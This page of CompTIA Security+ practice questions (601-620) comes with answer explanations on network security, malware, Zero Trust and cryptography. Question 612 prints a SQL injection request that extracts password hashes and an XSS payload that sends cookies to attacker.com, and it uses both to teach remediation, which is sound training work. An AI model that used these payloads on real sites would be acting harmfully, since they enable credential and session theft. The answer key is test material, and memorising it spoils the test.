All practice questions

2232 questions

Question 601Question

An employee working in a public conference hall receives several unsolicited contact cards and pop-up text messages on their smartphone via Bluetooth. A subsequent investigation by an IT technician confirms that no files, credentials, or personal data were stolen or accessed from the device. Which of the following wireless attack indicators is described in this scenario?

Show answer & explanation

Answer: Bluejacking

Answer

Bluejacking
Bluejacking is the practice of sending unsolicited messages or contact cards (vCards) to Bluetooth-enabled devices within close proximity. Because no sensitive information or files were exfiltrated from the victim's device, the activity is classified specifically as Bluejacking.

Step-by-Step Solution

1
Identify the attack medium and symptoms
Unsolicited messages and contact cards were pushed directly to a mobile device over a Bluetooth connection.
Analyzing the medium narrows the candidate attacks to Bluetooth short-range wireless exploits.
2
Evaluate data impact to differentiate specific attack indicators
The investigation verified that zero data was accessed, stolen, or modified.
Bluejacking is limited to sending unsolicited messages (spam), whereas Bluesnarfing involves active data theft.

Key Concept

Bluetooth Wireless Attacks (Bluejacking vs. Bluesnarfing)
Question 602Question

A cybersecurity team at an automated pharmaceutical manufacturing plant is investigating a covert intrusion into their industrial control systems. The adversary maintained persistent access for eight months without detection, utilized proprietary zero-day exploits against specialized programmable logic controller (PLC) firmware, and subtly modified drug formulation parameters rather than attempting extortion or causing immediate system outages. Which TWO of the following threat actor attributes and attack vector characteristics are demonstrated in this scenario?

Select all that apply

Show answer & explanation

Answer: The adversary demonstrates high technical sophistication and funding levels characteristic of a nation-state threat actor.; The attack path involved targeted zero-day vulnerability exploitation across specialized operational technology vectors.

Answer

The threat actor demonstrates high technical sophistication and financial backing typical of a nation-state actor, and the attack path leveraged zero-day vulnerabilities in specialized operational technology.
The scenario highlights an adversary with significant resourcing, technical capability, and patient strategic goals—key markers of nation-state actors. Furthermore, leveraging zero-day vulnerabilities against specialized industrial machinery represents a dedicated operational technology vector designed for targeted impact.

Step-by-Step Solution

1
Analyze threat actor attributes from the scenario observables
Eight months of persistent stealth, zero-day exploit development, and non-financial sabotage indicate advanced persistent threat (APT) capabilities standard in nation-state entities.
Threat actors are categorized by their sophistication, resources, and intent. High persistence and zero-day usage signify high resourcing.
2
Evaluate the attack vector and payload delivery characteristics
Targeting specific PLC firmware via zero-day vulnerabilities represents a highly focused operational technology attack vector.
Attack vectors differ by target surface; specialized embedded controllers require targeted research and exploitation paths.

Key Concept

Threat Actor Attributes and Attack Vectors
Estimated Time:2m 0s
Question 603Question

A security analyst reviews host logs and process telemetry from an endpoint suspected of infection. The analyst notices unauthorized background screen captures being saved to a hidden directory and outbound HTTP POST requests transmitting encrypted archives to an unrated external IP address on port 443. Which of the following malware classifications and primary capabilities are indicated by these observed technical artifacts? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Spyware functioning to monitor user activity and gather sensitive data without authorization; Command and control exfiltration mechanisms delivering captured data to remote attacker infrastructure

Answer

The observed indicators demonstrate spyware capabilities monitoring endpoint activity (capturing screen state) alongside command and control data exfiltration mechanisms transferring collected archives outbound over HTTP POST.
The combination of covert background screen captures and outbound encrypted POST traffic aligns directly with spyware monitoring behavior combined with command and control data exfiltration capabilities.

Step-by-Step Solution

1
Analyze host activity and process behaviors
Identified unauthorized screen captures saved locally, indicative of spyware monitoring.
Spyware stealthily captures screen state, keystrokes, or personal credentials without user consent.
2
Analyze network telemetry and exfiltration channels
Identified encrypted outbound HTTP POST requests to an external IP address.
Exfiltrating staged local files over encrypted web protocols to unknown IP addresses indicates active command and control communications.

Key Concept

Spyware telemetry and command and control exfiltration indicators of compromise
Question 604Question

A network security architect is reviewing the network segmentation design for an enterprise financial organization. The enterprise must implement appropriate isolation controls across diverse operational environments to satisfy regulatory compliance and mitigate lateral movement risks. Match each network design or segmentation technique on the left with its corresponding enterprise architectural requirement on the right.

Click a left item, then click its matching right item

Items

Microsegmentation
Air Gap
Demilitarized Zone (DMZ)
Jump Box / Bastion Host

Matches

Show answer & explanation

Answer

Microsegmentation connects with granular control of East-West workload traffic. Air Gap connects with complete physical network separation. Demilitarized Zone (DMZ) connects with hosting public-facing services away from internal networks. Jump Box connects with secure, audited administrator gateway access.
Each segmentation technique aligns directly with its primary defensive boundary design: Microsegmentation enforces host-to-host micro-boundaries (East-West); Air Gap enforces total physical isolation; DMZ enforces perimeter service separation (North-South); and a Jump Box enforces secure, centralized administrative entry into secure segments.

Step-by-Step Solution

1
Analyze Microsegmentation requirements
Identified as logical host/workload separation controlling East-West traffic
Microsegmentation isolates workloads at the hypervisor or OS layer within cloud/virtual environments.
2
Analyze Air Gap requirements
Identified as complete physical separation with zero network connectivity
Air-gapping ensures critical infrastructure cannot be targeted via network communication paths.
3
Analyze DMZ requirements
Identified as a screened boundary network for public services
DMZs prevent direct inbound access from public internet clients into internal core segments.
4
Analyze Jump Box requirements
Identified as a hardened management intermediary for privilege access
Bastion hosts centralize authentication, session recording, and access control for administrative tasks.

Key Concept

Network Segmentation and Isolation Controls
Question 605Question

A security analyst inspects a vulnerability scan report for an internal legacy application host. The report displays the following output:

Host: 10.12.8.44
Service: SMBv1 (Port 445/TCP)
Finding: Legacy file-sharing protocol active; vulnerable to remote code execution (MS17-010) and anonymous NULL session enumeration.
Risk Level: Critical

Which of the following actions represents the MOST effective host mitigation strategy to address this specific vulnerability?

Show answer & explanation

Answer: Disable the legacy SMBv1 feature on the host operating system and require SMB signing for connection sessions.

Answer

Disabling the legacy SMBv1 feature on the host operating system and requiring SMB signing for connection sessions.
The most effective remediation is disabling the insecure, deprecated SMBv1 protocol directly on the host operating system and enforcing SMB signing. This removes the attack surface associated with legacy file-sharing vulnerabilities (such as MS17-010/EternalBlue) and prevents unauthorized NULL session enumeration.

Step-by-Step Solution

1
Analyze the vulnerability report finding
Identified SMBv1 on TCP port 445 as a host protocol vulnerability susceptible to remote execution and NULL session enumeration.
Understanding the precise root cause host vulnerability dictates the appropriate remediation measure.
2
Evaluate mitigation controls for host vulnerabilities
Directly disabling outdated SMBv1 services and requiring secure SMB signing eliminates the flaw at the endpoint host.
Host hardening requiring removal of legacy protocols provides defense-in-depth and prevents lateral movement within internal network segments.

Key Concept

Host and Infrastructure Hardening - Disabling Legacy Protocols
Estimated Time:1m 30s
Question 606Question

Match each Zero Trust Architecture principle on the left with its corresponding operational description on the right.

Click a left item, then click its matching right item

Items

Explicit Verification
Least Privilege Access
Assume Breach
Microsegmentation

Matches

Show answer & explanation

Answer

Explicit Verification matches authenticating and authorizing every access request based on identity and context; Least Privilege Access matches limiting user rights using JIT and JEA controls; Assume Breach matches operating under the premise that internal systems are compromised; Microsegmentation matches dividing network environments into granular zones to restrict lateral movement.
Each Zero Trust principle accurately maps to its operational definition: Explicit Verification dynamically validates requests; Least Privilege Access enforces minimal permissions; Assume Breach plans for internal compromise; Microsegmentation prevents lateral network movement.

Step-by-Step Solution

1
Identify the concept requiring continuous authentication and contextual authorization for every transaction.
Explicit Verification aligns with validating identity, location, and device status dynamically.
Zero Trust eliminates implicit trust based on network location, mandating explicit validation.
2
Identify the concept designed to restrict user permissions to minimum necessary levels.
Least Privilege Access aligns with implementing JIT (Just-In-Time) and JEA (Just-Enough-Access) controls.
Restricting permissions minimizes potential exposure if credentials are compromised.
3
Identify the architectural mindset assuming active compromise within internal perimeters.
Assume Breach aligns with operating under internal compromise conditions and encrypting all traffic.
Assuming breach forces organizations to contain blast radius and continuously inspect internal communications.
4
Identify the network design strategy used to isolate workloads and stop internal spread.
Microsegmentation aligns with creating granular network boundaries.
Microsegmentation prevents lateral movement across internal subnets and applications.

Key Concept

Core principles and operational tenets of Zero Trust Architecture
Question 607Question

A security analyst is investigating network monitoring alerts in a enterprise corporate office. Wireless packet captures and syslog entries show that client laptops are receiving spoofed 802.11 Deauthentication frames originating from a legitimate Access Point's BSSID. Immediately following disassociation, affected clients connect to a rogue access point broadcasting the corporate ESSID and prompting users for authentication via an insecure EAP-GTC protocol with an untrusted RADIUS server certificate. Which of the following statements correctly identify the attack mechanism and the most effective combination of technical controls to mitigate this threat? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: The observed activity indicates an Evil Twin attack leveraging management frame spoofing to perform credential harvesting via authentication downgrade.; Enforcing IEEE 802.11w Protected Management Frames (PMF) on access points and configuring client 802.1X supplicants to strictly validate server certificates will mitigate the attack.

Answer

The incident represents an Evil Twin attack combined with wireless deauthentication spoofing. The required mitigations are enforcing 802.11w Protected Management Frames (PMF) to encrypt management frames and configuring strict RADIUS server certificate validation on client supplicants.
The scenario describes a classic Evil Twin deployment facilitated by a wireless deauthentication attack. Attackers send spoofed 802.11 disassociation/deauthentication management frames using the real access point's BSSID to disconnect target clients. Once disconnected, client devices automatically reconnect to the strongest signal for their configured ESSID, attaching to the attacker's rogue access point. The rogue AP attempts to harvest credentials via EAP-GTC downgrade and a self-signed RADIUS certificate. To counter this, organizations must deploy IEEE 802.11w Protected Management Frames (PMF) to cryptographically authenticate management frames (preventing spoofed deauth packets) and enforce strict server certificate validation in the client 802.1X supplicant configuration so devices refuse connection to unverified RADIUS servers.

Step-by-Step Solution

1
Analyze the observed attack indicators in the packet capture.
Unauthenticated 802.11 Deauthentication frames coupled with a rogue AP broadcasting the legitimate ESSID and offering EAP-GTC with an untrusted certificate point to an Evil Twin credential harvesting attack.
Deauthentication frames disconnect clients from the legitimate AP, while the rogue AP (Evil Twin) tricks client supplicants into connecting and offering credentials over a downgraded protocol.
2
Evaluate technical controls at Layer 2 (802.11 wireless) and Layer 7 / Authentication.
IEEE 802.11w (PMF) encrypts and authenticates 802.11 management frames (preventing spoofed deauth packets), and enforcing certificate pinning/validation prevents clients from trusting the rogue RADIUS server.
Combining PMF and mandatory RADIUS certificate validation mitigates both the disassociation vector and the rogue AP association vector.

Key Concept

Wireless Attack Indicators (Evil Twin, Deauthentication) and Mitigations (802.11w PMF, RADIUS Certificate Validation)
Estimated Time:2m 0s
Question 608Question

An enterprise security architect is evaluating cloud operational boundaries across various enterprise environments. Match each cloud service or deployment model scenario on the left with the corresponding customer security management responsibility on the right.

Click a left item, then click its matching right item

Items

Infrastructure as a Service (IaaS) instance hosting custom line-of-business applications
Platform as a Service (PaaS) managed container environment
Software as a Service (SaaS) cloud communication and productivity portal
On-premises Private Cloud infrastructure hosting legacy databases

Matches

Show answer & explanation

Answer

In IaaS, the customer manages the guest OS, host firewalls, and application stack. In PaaS, the customer manages application code and access controls while the provider manages the OS and runtime engine. In SaaS, the provider manages the application and infrastructure while the customer manages user access and data governance. In a Private Cloud, the enterprise manages all physical infrastructure, hypervisors, and virtual workloads.
Each cloud service model defines a distinct boundary of ownership. In IaaS, hardware virtualization is provided by the CSP while OS patching, host firewalls, and application management remain customer duties. In PaaS, the CSP manages the OS and runtime environment, while the customer manages code and application access. In SaaS, the CSP manages the full application stack while the customer manages identities and data classification. In a private cloud on-premises setup, the enterprise retains end-to-end control of physical and virtual assets.

Step-by-Step Solution

1
Analyze the IaaS deployment model requirements.
Identify that IaaS leaves the guest operating system, network firewall configurations, and application security under customer administration.
IaaS provides raw virtualized hardware and storage, meaning OS administration remains with the tenant.
2
Evaluate PaaS service boundary expectations.
Determine that PaaS hides the OS management layer from the customer, focusing customer responsibility on custom code and data schema controls.
PaaS abstracts operating system execution environments so developers can focus purely on application delivery.
3
Distinguish SaaS operational limits.
Map SaaS to user identity management, credential governance, and data security policies.
SaaS providers deliver completed application functionality, eliminating customer maintenance of application binaries or platform software.
4
Differentiate Private Cloud infrastructure responsibilities.
Confirm complete organization ownership over hardware, physical controls, and virtualization layers.
Private clouds deployed on-premises do not transfer facility or physical infrastructure management to a third party.

Key Concept

Cloud Shared Responsibility Model and Cloud Deployment Model Boundaries
Question 609Question

A security administrator needs to protect sensitive data stored on company laptops by ensuring that storage drives automatically encrypt all data at rest at the hardware layer without relying on the host operating system. Which of the following technologies best fulfills this requirement?

Show answer & explanation

Answer: Self-Encrypting Drive (SED)

Answer

Self-Encrypting Drive (SED)
Self-Encrypting Drives (SEDs) contain an integrated cryptographic processor directly on the storage controller that handles encryption and decryption automatically. Because the crypto operations occur on the drive hardware itself, encryption functions transparently and independently of the host operating system.

Step-by-Step Solution

1
Identify the primary storage security requirements from the scenario.
The requirement calls for automatic hardware-level bulk encryption of storage media independently of the host operating system.
The scenario highlights protecting data at rest on laptop drives without relying on software or operating system features.
2
Evaluate the capabilities of storage encryption options.
A Self-Encrypting Drive (SED) includes onboard cryptographic hardware built into the disk controller that transparently encrypts data written to the drive.
SEDs perform media encryption directly within the drive controller microchip.

Key Concept

Hardware-Based Storage Encryption (SED)
Estimated Time:1m 0s
Question 610Question

A security analyst is reviewing an audit report detailing cryptographic vulnerabilities identified across an enterprise network. Match each observed security incident or technical finding on the left with its underlying cryptographic weakness on the right.

Click a left item, then click its matching right item

Items

An attacker retroactively decrypts historical TLS traffic captured from a web server after stealing its long-term private key.
A database review reveals that identical credit card numbers produce identical ciphertext entries across multiple records.
An attacker recovers plaintext communications from a legacy wireless system by collecting packets transmitted with repeated nonces.
A security audit uncovers an application using a fixed 56-bit symmetric cipher key compiled directly into client software binaries.

Matches

Show answer & explanation

Answer

1. Retroactive decryption of captured traffic maps to Absence of Perfect Forward Secrecy (PFS). 2. Identical ciphertext for identical database inputs maps to Electronic Codebook (ECB) mode. 3. Plaintext recovery from repeated nonces maps to Keystream reuse from static IVs. 4. Compiled 56-bit symmetric key maps to Inadequate key length.
Each security finding correctly pairs with its fundamental cryptographic flaw: compromise of past TLS sessions due to lack of PFS; deterministic identical ciphertexts due to ECB block mode; keystream exposure due to static IV reuse; and weak key entropy due to an obsolete 56-bit key length.

Step-by-Step Solution

1
Analyze the first scenario involving compromise of a private key leading to retroactive session decryption.
Identify that static RSA key exchange allows past traffic to be decrypted if the private key is exposed.
Perfect Forward Secrecy ensures ephemeral session keys are destroyed and cannot be derived from long-term private keys.
2
Analyze the second scenario involving pattern preservation in encrypted database entries.
Identify that deterministic block-by-block encryption without initialization vectors exhibits ECB mode behavior.
ECB mode maps identical plaintext blocks directly to identical ciphertext blocks.
3
Analyze the third scenario involving plaintext recovery via repeated nonces.
Recognize that static IV usage in stream ciphers leads to keystream reuse.
When the same keystream encrypts multiple plaintexts, XORing two ciphertexts cancels out the keystream.
4
Analyze the fourth scenario involving a hardcoded 56-bit symmetric key.
Determine that a 56-bit key size is cryptographically weak due to low key space size.
Modern computing hardware can brute-force a 56-bit key space in hours or minutes.

Key Concept

Cryptographic and Security Control Weaknesses
Question 611Question

During an investigation at a regional power grid operator, incident responders uncover an adversary that maintained persistent, undetected access across internal control networks for over nine months. The adversary utilized customized living-off-the-land techniques to exfiltrate SCADA architecture diagrams and operational telemetry while intentionally avoiding ransomware deployment or disruptive activity. Which of the following threat actor types and attribute profiles best aligns with this behavior?

Show answer & explanation

Answer: Nation-state threat actor characterized by high sophistication, long-term strategic motivation, and extensive resource funding.

Answer

Nation-state threat actor characterized by high sophistication, long-term strategic motivation, and extensive resource funding.
The correct option correctly attributes the threat activity to a nation-state actor. Prolonged, covert access combined with sophisticated living-off-the-land techniques and targeted exfiltration of critical infrastructure telemetry indicates a well-funded, highly sophisticated threat actor motivated by strategic intelligence gathering.

Step-by-Step Solution

1
Analyze the adversary's tactics, techniques, and procedures (TTPs) described in the scenario.
Identified nine months of undetected persistence, living-off-the-land techniques, and zero destructive payload execution.
Tactical restraint and stealth reflect advanced operational discipline and sophisticated capabilities.
2
Evaluate the targeted assets and primary objective.
Targeted SCADA architecture diagrams and operational telemetry for exfiltration.
Exfiltrating critical infrastructure blueprints aligns with strategic espionage rather than immediate financial extortion or ideological vandalism.
3
Map the observed attributes (sophistication, funding, intent, persistence) to threat actor classifications.
Nation-state actors are the primary group with the resource level, patience, and strategic intent to conduct prolonged intelligence collection against critical infrastructure.
Matching attributes and motivations correctly distinguishes nation-state APTs from criminal or hacktivist entities.

Key Concept

Threat Actor Attributes and Intent Alignment
Estimated Time:1m 30s
Question 612Question

A security analyst investigates application logs following an intrusion alert on a customer-facing portal and identifies two distinct HTTP request strings executed in rapid succession:

text
GET /search.php?item=102%20UNION%20SELECT%20username,password_hash%20FROM%20accounts-- HTTP/1.1
POST /feedback.php HTTP/1.1
Host: portal.example.com
Content-Type: application/x-www-form-urlencoded

comment=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

Based on the log evidence provided, which of the following software remediations must the development team implement to eliminate these specific application vulnerabilities? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Enforce parameterized SQL queries and prepared statements within the database abstraction layer for search queries.; Apply contextual HTML entity output encoding to user-supplied input prior to rendering it within the web application interface.

Answer

The correct remediations are implementing parameterized SQL queries (prepared statements) to mitigate the SQL injection vulnerability and utilizing contextual output encoding to neutralize the Cross-Site Scripting (XSS) attack.
The logs reflect two classic web application attack vectors: SQL Injection (manipulating backend database logic via unvalidated parameters) and Cross-Site Scripting (injecting malicious client-side scripts into web pages). The proper software development remedies are parameterized database queries (prepared statements) to isolate parameter inputs from SQL syntax, and contextual output encoding to prevent user-controlled scripts from executing inside the victim's browser.

Step-by-Step Solution

1
Analyze the first HTTP request GET payload string
The string contains SQL keywords (`UNION SELECT`) and comment delimiters (`--`), indicating a classic SQL Injection (SQLi) attack aimed at database extraction.
Identify the specific flaw type affecting database interaction.
2
Analyze the second HTTP request POST body payload string
The string contains JavaScript elements (`<script>` tag targeting `document.cookie`), indicating a Cross-Site Scripting (XSS) attack aimed at cookie theft.
Identify the client-side execution flaw type affecting user browser execution.
3
Select targeted developer remedies for each identified vulnerability class
Prepared statements prevent SQL structure alteration by binding inputs as data, while output encoding prevents the web browser from interpreting user inputs as executable HTML/JS instructions.
Match software vulnerability remediation standards to verified attack vectors.

Key Concept

Application Input Validation and Output Encoding Mitigations
Question 613Question

A biotechnology organization is establishing its security governance documentation. Executive leadership mandates the creation of an overarching, non-technical document that outlines management's strategic intent, defines security goals, and establishes mandatory rules for protecting intellectual property across the entire enterprise. Which security governance document type must executive leadership issue to satisfy this requirement?

Show answer & explanation

Answer: Organizational Security Policy

Answer

Organizational Security Policy
An Organizational Security Policy is a high-level, executive-approved document that defines management's intent, security objectives, and mandatory expectations for the entire enterprise. It serves as the foundation of the security governance framework and remains deliberately non-technical to maintain long-term relevance.

Step-by-Step Solution

1
Analyze the scenario requirements
Identified key requirements: executive leadership authority, high-level strategic intent, non-technical focus, broad enterprise scope, and mandatory compliance.
Governance documents occupy distinct tiers within the security documentation hierarchy based on authority level, scope, and technical granularity.
2
Compare requirements against the security governance documentation hierarchy
High-level strategic directives issued by management align with policies. Specific technical configurations align with baselines, discretionary recommendations align with guidelines, and detailed action steps align with procedures.
Policies establish top-level goals and mandatory compliance; standards and baselines enforce uniform configuration rules; guidelines advise; procedures define steps.
3
Select the matching governance document
The Organizational Security Policy fulfills executive leadership's mandate for an overarching strategic directive.
Policies serve as the foundation of security governance by formalizing executive commitment and steering organizational security behavior.

Key Concept

Security Governance Hierarchy (Policy vs. Standard vs. Baseline vs. Guideline vs. Procedure)
Question 614Question

An enterprise security architect is updating the organization's network architecture to mitigate lateral threat movement, secure legacy components, and control administrative access across enterprise zones. Match each network design or segmentation technique on the left with its corresponding architectural application on the right.

Click a left item, then click its matching right item

Items

East-West Traffic Microsegmentation
Screened Subnet (DMZ) with Dual-Homed Firewalls
Air-Gapped Out-of-Band Management Network
Software-Defined Perimeter (SDP) Gateway

Matches

Show answer & explanation

Answer

East-West Traffic Microsegmentation maps to enforcing host-level firewall policies between databases in the same subnet; Screened Subnet with Dual-Homed Firewalls maps to terminating internet-facing connections in a perimeter zone; Air-Gapped Out-of-Band Management Network maps to isolating systems without routed external connectivity; Software-Defined Perimeter Gateway maps to dynamically provisioning authenticated access while hiding infrastructure.
Each technique addresses a specific network segmentation boundary requirement: East-West microsegmentation controls internal host-to-host traffic within the same subnet; screened subnets isolate public services at the network perimeter; air-gaps eliminate packet routing paths entirely; and SDP gateways conceal infrastructure behind identity-verified tunnels.

Step-by-Step Solution

1
Analyze East-West traffic flow controls
Identify microsegmentation as the technique that enforces policies on lateral movement between workloads in the same segment.
Traditional perimeter firewalls monitor North-South traffic, whereas microsegmentation monitors East-West internal traffic.
2
Analyze perimeter untrusted access controls
Map screened subnets (DMZ) with dual firewalls to untrusted external perimeter terminations.
Screened subnets provide buffer zones between external networks and protected internal networks.
3
Analyze strict physical and operational isolation requirements
Map air-gapping to systems that require total absence of external packet routing.
Air-gapping guarantees physical or strict logical disconnect from un-trusted networks.
4
Analyze Zero Trust network access mechanisms
Map Software-Defined Perimeter (SDP) to dynamic, identity-based cloaking of services.
SDP creates individual encrypted tunnels to authorized applications while keeping network infrastructure concealed.

Key Concept

Network Segmentation Archetypes and Traffic Control Architecture
Estimated Time:2m 0s
Question 615Question

An enterprise architecture team is designing a NIST SP 800-207 compliant Zero Trust solution to enforce dynamic control plane and data plane boundaries across hybrid environments. Pair each Zero Trust logical component on the left with its precise operational function on the right.

Click a left item, then click its matching right item

Items

Policy Engine (PE)
Policy Administrator (PA)
Policy Enforcement Point (PEP)
Continuous Diagnostics and Mitigation (CDM) System

Matches

Show answer & explanation

Answer

Policy Engine (PE) matches with applying enterprise trust algorithms to determine access decisions; Policy Administrator (PA) matches with executing governance decisions by issuing control commands or credentials to manage the connection path; Policy Enforcement Point (PEP) matches with operating in the data plane to intercept traffic and enforce connection states; Continuous Diagnostics and Mitigation (CDM) System matches with continuously gathering asset health metrics to feed real-time compliance inputs.
In NIST SP 800-207 Zero Trust Architecture, logical responsibilities are strictly separated between decision-making, administration, enforcement, and environmental telemetry. The Policy Engine evaluates trust algorithms to decide access; the Policy Administrator signals session establishment or teardown; the Policy Enforcement Point intercepts data plane traffic to enforce session commands; and the Continuous Diagnostics and Mitigation System provides real-time posture feeds to dynamically reassess trust.

Step-by-Step Solution

1
Differentiate control plane components from data plane components in NIST SP 800-207 Zero Trust Architecture.
Identified Policy Engine and Policy Administrator as control plane entities (PDP), PEP as data plane boundary, and CDM as an external security input source.
Establishing plane separation is required to evaluate structural roles.
2
Differentiate the decision component from the execution component within the control plane.
The Policy Engine evaluates rules to make access decisions, whereas the Policy Administrator commands session creation or termination.
Conflating PE and PA roles is a common architectural error.
3
Identify the data plane component responsible for inline enforcement.
The Policy Enforcement Point directly intercepts subject traffic and enforces PA instructions.
The PEP is the only component listed that resides directly in the traffic flow path.
4
Identify the contextual state feed component.
The CDM System monitors device health, vulnerability data, and patch state to provide continuous diagnostic inputs to the PE.
Zero Trust decisions require real-time dynamic trust scoring provided by CDM telemetry.

Key Concept

NIST SP 800-207 Zero Trust Architecture Components and Control/Data Plane Separation
Question 616Question

Match each virtualization or containerization security control on the left with its corresponding primary isolation capability on the right.

Click a left item, then click its matching right item

Items

Type 1 Hypervisor
Control Groups (cgroups)
Namespaces
Microsegmentation

Matches

Show answer & explanation

Answer

Type 1 Hypervisor pairs with bare-metal hardware execution; Control Groups (cgroups) pair with resource allocation limits; Namespaces pair with kernel view isolation; Microsegmentation pairs with granular network traffic isolation.
Each isolation control serves a specific functional role: Type 1 hypervisors execute on bare-metal hardware, control groups (cgroups) regulate host resource allocation per container, namespaces partition kernel visibility to restrict process boundaries, and microsegmentation enforces granular network traffic rules between virtual workloads.

Step-by-Step Solution

1
Identify the virtualization control executing at the hardware level.
Type 1 Hypervisor operates directly on bare-metal host hardware to isolate VMs.
Type 1 hypervisors sit directly on the physical hardware without needing a host OS.
2
Distinguish between container resource metering and system visibility isolation controls.
cgroups govern resource limits, while namespaces govern resource visibility.
cgroups enforce quantitative bounds on host CPU/RAM usage, whereas namespaces restrict process visibility into host kernel structures.
3
Identify the network security control designed for virtualized container/VM traffic.
Microsegmentation restricts network traffic between individual virtualized instances.
Microsegmentation applies fine-grained network policies to prevent lateral movement across virtual environments.

Key Concept

Virtualization and Container Isolation Mechanisms
Question 617Question

A network administrator needs to host a publicly accessible web server while protecting internal enterprise databases from direct internet exposure. Which network design topology should the administrator implement to place the web server in an isolated perimeter zone between the external internet and the internal private network?

Show answer & explanation

Answer: Demilitarized zone (DMZ)

Answer

Demilitarized zone (DMZ)
A demilitarized zone (DMZ) functions as a physical or logical perimeter subnetwork that houses external-facing services such as web, DNS, or mail servers. Placing public resources within a DMZ ensures that internet users can communicate with the web server without gaining direct routing access to sensitive internal servers located behind internal firewalls.

Step-by-Step Solution

1
Identify the requirement to host an internet-facing application while shielding private database infrastructure.
Determine that a boundary network is needed between untrusted external traffic and trusted internal resources.
Public-facing hosts have a higher risk of attack and must be separated from sensitive internal servers.
2
Select the appropriate network isolation architecture.
Choose a Demilitarized Zone (DMZ) topology.
A DMZ enforces traffic boundaries via firewalls so that external requests reach the web server without direct network access to the internal network.

Key Concept

Demilitarized Zone (DMZ) and Perimeter Isolation
Question 618Question

An enterprise security architect is designing a network architecture for a hybrid micro-datacenter that hosts PCI-DSS scoped payment processing workloads alongside unmanaged IoT environmental sensors on shared physical network switches. The design must prevent direct Layer 2 or Layer 3 lateral movement between any endpoints located within the same IP subnet, without requiring dedicated physical switches or administrative overhead from managing hundreds of individual VLAN subnets and IP pools. Which of the following secure network design strategies best meets these requirements?

Show answer & explanation

Answer: Configure Private VLANs (PVLANs) on the access switches using isolated secondary VLANs to restrict port-to-port communication within the shared subnet.

Answer

Configuring Private VLANs (PVLANs) using isolated secondary VLANs provides Layer 2 microsegmentation within a single IP subnet, blocking port-to-port East-West traffic without allocating extra IP subnets or physical switch hardware.
Private VLANs (PVLANs) extend standard VLAN capabilities by subdividing a single broadcast domain into secondary isolation zones. Endpoints connected to isolated ports can only communicate with designated promiscuous ports (such as the default gateway router), preventing lateral movement and frame forwarding between peers on the same subnet without allocating new IP subnets.

Step-by-Step Solution

1
Analyze the scenario constraints and security objectives.
Identified the need to block lateral movement (East-West traffic) between endpoints residing on the exact same IP subnet and physical switch without creating multiple subnets or buying dedicated hardware.
Standard IP routing controls operate at Layer 3 between subnets, whereas endpoints on the same subnet communicate directly at Layer 2 through switch MAC address tables.
2
Evaluate network isolation technologies against Layer 2 constraints.
Private VLANs (PVLANs) split a primary VLAN into secondary sub-domains (isolated, community, promiscuous). Isolated ports cannot communicate with any other isolated or community port on the same switch.
PVLAN technology enforces Layer 2 port isolation while preserving a single IP subnet boundary, avoiding routing complexity and extra VLAN/subnet overhead.
3
Eliminate ineffective perimeter or sub-interface architecture proposals.
Options relying on standard 802.1Q inter-VLAN routing, perimeter firewalls, or passive NIPS taps fail to restrict intra-subnet Layer 2 frame forwarding.
Traffic between endpoints in the same subnet never traverses a router or perimeter firewall unless Layer 2 port isolation is enforced at the access layer.

Key Concept

Private VLAN (PVLAN) Microsegmentation
Estimated Time:3m 0s
Question 619Question

During an enterprise incident response triage, security engineers analyze a compromised domain controller demonstrating unauthorized administrative activity. Diagnostics reveal that the attack payload was injected directly into system RAM using a legitimate administrative utility, executing strictly in volatile memory without writing any standalone binary file to the host hard drive. Which of the following malware classifications best describes this type of threat?

Show answer & explanation

Answer: Fileless malware

Answer

Fileless malware
Fileless malware executes directly within volatile system memory (RAM) or piggybacks on legitimate host tools (such as PowerShell or WMI) without writing binary files to the storage drive, making traditional signature-based disk scans ineffective.

Step-by-Step Solution

1
Analyze the technical indicators provided in the incident log scenario.
Identified that the payload resides and executes strictly within system volatile RAM and leaves no standalone binary artifacts on disk.
Understanding the persistence and storage medium helps classify the malware category.
2
Compare observed Indicators of Compromise (IoCs) against standard malware taxonomy definitions.
Malware that operates entirely in memory or leverages native system tools without leaving traditional file footprint matches the fileless malware classification.
Fileless attacks evade standard disk-based anti-virus signatures by avoiding traditional executable writes.

Key Concept

Fileless Malware Execution and Volatile Memory Indicators
Question 620Question

A regional utility provider migrates its customer telemetry analytics application to a cloud provider's Platform as a Service (PaaS) solution. During a routine vulnerability scan, an auditor discovers an unpatched kernel vulnerability in the underlying host operating system powering the database runtime. Under the cloud shared responsibility model, which of the following parties is responsible for patching this host operating system vulnerability?

Show answer & explanation

Answer: The Cloud Service Provider, because PaaS abstracts host infrastructure and operating systems, placing host management solely under provider responsibility.

Answer

The Cloud Service Provider is responsible because PaaS abstracts host infrastructure and operating systems, placing host management solely under provider responsibility.
In Platform as a Service (PaaS), the Cloud Service Provider (CSP) manages the infrastructure layer including physical facilities, server hardware, virtualization, and host operating system maintenance. Tenants in PaaS environments are responsible for application code, user permissions, and customer data configuration.

Step-by-Step Solution

1
Identify the cloud service model referenced in the scenario.
The organization is utilizing a Platform as a Service (PaaS) architecture.
Responsibilities vary significantly depending on whether the service model is IaaS, PaaS, or SaaS.
2
Determine the boundary of responsibility for host operating system management in PaaS.
In PaaS, the provider manages physical hardware, network infrastructure, hypervisors, OS patching, and middleware runtimes.
The customer is only responsible for managing application code, data, and access configurations.
3
Assign patch management duty for the host OS kernel vulnerability.
Remediating the host OS vulnerability falls strictly on the Cloud Service Provider.
Customers do not have direct root or admin access to host operating systems supporting PaaS platforms.

Key Concept

Shared Responsibility Model in Platform as a Service (PaaS)
PreviousPage 31 / 112Next
All practice questions — CompTIA Security+ | Examkin